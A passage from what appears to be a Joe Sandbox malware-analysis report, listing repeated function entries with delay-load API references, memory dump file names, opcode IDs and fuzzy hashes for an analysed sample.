                                                              • Instruction Fuzzy Hash: 2FB012912DC3407C334451953F03D77414DC1C1F303308A1BF000C2143F4404D802032
                                                              Function 009B498F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 07d547c2032e1e308f9129796c305224e634a1298eb3ccbec07d1feddd5ea906
                                                              • Instruction ID: 2748f17fbfc13e9cab6d740ee33c1b70c22a70b73c3380ea2d99adc2e1c7a860
                                                              • Opcode Fuzzy Hash: 07d547c2032e1e308f9129796c305224e634a1298eb3ccbec07d1feddd5ea906
                                                              • Instruction Fuzzy Hash: 48B012912DC2407C320451953F03D77414DC1C2F30330C91BF400C2143F4404D402132
                                                              Function 009B4985 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ad7c850fc6715a07f68e06dcba971c2def9666805a35cb05b56721e62bb31a57
                                                              • Instruction ID: a5f80e2d487f3fc6ce4b88aaa20004a06feface77a285fc82c64c316f4f610a1
                                                              • Opcode Fuzzy Hash: ad7c850fc6715a07f68e06dcba971c2def9666805a35cb05b56721e62bb31a57
                                                              • Instruction Fuzzy Hash: D0B012812DC2407C320851E53F03D77414DC1C0F30330CD1FF000C2243E4408C442032
                                                              Function 009B49B7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 766845500fd60f71610141c507c375ddb03d02019c6eddaa3e35142d1e8ca4fb
                                                              • Instruction ID: 6e25af6aef6614102777bbf15577013c607051fb807fb4a79a048746092de7fb
                                                              • Opcode Fuzzy Hash: 766845500fd60f71610141c507c375ddb03d02019c6eddaa3e35142d1e8ca4fb
                                                              • Instruction Fuzzy Hash: 14B012812DD2407C320451953F03D77414EC1C1F30331C92BF400C2183E4404C402132
                                                              Function 009B49A3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 46df162179798b1718ac9ff04048f996cf759496c459fc7cc155d187a6527878
                                                              • Instruction ID: b1cf60bf475fd526c50cd759ed1a2571551c12897a65a1412dc2b2706a5eeb4f
                                                              • Opcode Fuzzy Hash: 46df162179798b1718ac9ff04048f996cf759496c459fc7cc155d187a6527878
                                                              • Instruction Fuzzy Hash: 3DB012912DC2407C320451953F03D77414EC1C1F30330891BF400C2143F4414E422032
                                                              Function 009B49D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 40b25889e5cb721e278a1bf44417e59e4febbd53a5d960842fa3420f915b82ff
                                                              • Instruction ID: 26b24b9d08bd1ff8ec58ce7f56e94fdf3ff9f1a58d71ae78efd5577cb8556be1
                                                              • Opcode Fuzzy Hash: 40b25889e5cb721e278a1bf44417e59e4febbd53a5d960842fa3420f915b82ff
                                                              • Instruction Fuzzy Hash: 95B012812ED2407C320451953F03D77418FC5C0F30331891FF000C2143E4404C402032
                                                              Function 009B49C1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b1d8bbf77956426b64324ad8baf7ecd52af7208cef8a53e1122eaed1e36b8bd6
                                                              • Instruction ID: 4002369a9b3865b5d38c7bd988d50997ca1dd46cc50ad9294850332e371806db
                                                              • Opcode Fuzzy Hash: b1d8bbf77956426b64324ad8baf7ecd52af7208cef8a53e1122eaed1e36b8bd6
                                                              • Instruction Fuzzy Hash: 17B012912DD3407C334452953F03D7B414EC1C0F303318A1BF000C2143E4404C802032
                                                              Function 009B4906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3e9db04674940ea764662e7a97b489d181a9de0f43e57d490ebc8fef0cd74c09
                                                              • Instruction ID: d7abc6cd2d8cefbb04932598e948a4c64df3cd83ca055989601968082578ecb0
                                                              • Opcode Fuzzy Hash: 3e9db04674940ea764662e7a97b489d181a9de0f43e57d490ebc8fef0cd74c09
                                                              • Instruction Fuzzy Hash: 55B012912DC2807C320411913F03D77410DC1C0F30330891BF400C1043A8425D522032
                                                              Function 009B493F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4c59bb5db8f253b0abd28335b59347f8895993e4ba839face83534e9f6081cb2
                                                              • Instruction ID: f01f76fcd1e51d983b59ab5b7b0ff0dc462b0c843250b58826825d88586652d2
                                                              • Opcode Fuzzy Hash: 4c59bb5db8f253b0abd28335b59347f8895993e4ba839face83534e9f6081cb2
                                                              • Instruction Fuzzy Hash: 04B012852DC3407C320451D53F03D77414DC1C1F30330C91BF400C2243E4405C402132
                                                              Function 009B4935 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 49b4f6023853e82272dfa8cde7729303490bc2be1fcca6b455010dfcb32e725e
                                                              • Instruction ID: a2288c842e191774a90383d9ee6d07942bffbc5c0bef9a0c764bbeca4d47088b
                                                              • Opcode Fuzzy Hash: 49b4f6023853e82272dfa8cde7729303490bc2be1fcca6b455010dfcb32e725e
                                                              • Instruction Fuzzy Hash: C9B012812EC3407C320451957F03D77415DC1C1F303308A1FF000C2143E4404C402032
                                                              Function 009B492B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a6876f1a0e9f60486ccfce21f665c4c546d8c165fc645844c9cb52a3c5d7ff62
                                                              • Instruction ID: dda071ef519d803029d19dfe7e06c796ebce98f045b6e0786ceab734b4570bfd
                                                              • Opcode Fuzzy Hash: a6876f1a0e9f60486ccfce21f665c4c546d8c165fc645844c9cb52a3c5d7ff62
                                                              • Instruction Fuzzy Hash: 40B012812DC2407C320451957F03D77415DC1C1F303308B1BF400C2143E4414D422032
                                                              Function 009B4921 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: c2faca1e51f3bff30e1e72507c4622aa8f2fa3e9c4f24c4fa9fbdd66c9f84ac6
                                                              • Instruction ID: d40e8291e90aab7a21b58f49c7a86e59d225fd464fca6e0c73f8bf11a1e61989
                                                              • Opcode Fuzzy Hash: c2faca1e51f3bff30e1e72507c4622aa8f2fa3e9c4f24c4fa9fbdd66c9f84ac6
                                                              • Instruction Fuzzy Hash: 4FB012812DC3407C334451957F03D77415DC1C1F303308B1BF000C2143E4404C802032
                                                              Function 009B495D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d0efcd7e504c9c46953b5e34594b6a273749c50d9f8bd453fcc45fe8e933026a
                                                              • Instruction ID: 1f401fed386d1ec4d09184abb17b900fa8d8200bbd5aa1695db04b49bee8ee59
                                                              • Opcode Fuzzy Hash: d0efcd7e504c9c46953b5e34594b6a273749c50d9f8bd453fcc45fe8e933026a
                                                              • Instruction Fuzzy Hash: 12B012852DC340BC320451D53F03D77414DC1C0F30330891FF000C2243E4404C402132
                                                              Function 009B4953 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e0f830fef8af0a0ca514589f904a239a53bc27a1e658f98bb040c30a5267ece6
                                                              • Instruction ID: cc46172c75e6a2b90af4f1c2afe943f6d1c1717fea9f9888e7185deb6422bb69
                                                              • Opcode Fuzzy Hash: e0f830fef8af0a0ca514589f904a239a53bc27a1e658f98bb040c30a5267ece6
                                                              • Instruction Fuzzy Hash: 21B012852DC3407C320451D53F03D77414DC1C0F30330891BF400C2243E4414E422032
                                                              Function 009B4949 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3d3b661286942eeaf78470fb89e6210c2d9bc0fb893afb56e608a95064668dc3
                                                              • Instruction ID: ca40af777538e67347d8a619de6c9e25aa7ae089d6648c1d38c5a85b11ba4ac4
                                                              • Opcode Fuzzy Hash: 3d3b661286942eeaf78470fb89e6210c2d9bc0fb893afb56e608a95064668dc3
                                                              • Instruction Fuzzy Hash: 82B012852DC3407C334451D53F03D77414DC1C0F303308A1BF000C2243E4404C802032
                                                              Function 009B497B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 8616e0fe68d5cf7df202b346f47bb5908c11c4d01f6a51c1e48e3b939ff56179
                                                              • Instruction ID: b70b26f1d222236ed6d6c7cdd0404d773ec3ae9dd35f3772152de865bd730efd
                                                              • Opcode Fuzzy Hash: 8616e0fe68d5cf7df202b346f47bb5908c11c4d01f6a51c1e48e3b939ff56179
                                                              • Instruction Fuzzy Hash: F5B012812DC2407C320851953F03D77414DC1C0F30330C91BF400C2243E4418D4A2032
                                                              Function 009B4967 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 202346f946c530ea689b9e9d21f412cccbfc8d53efb2d2ab8b654ce7cd64d635
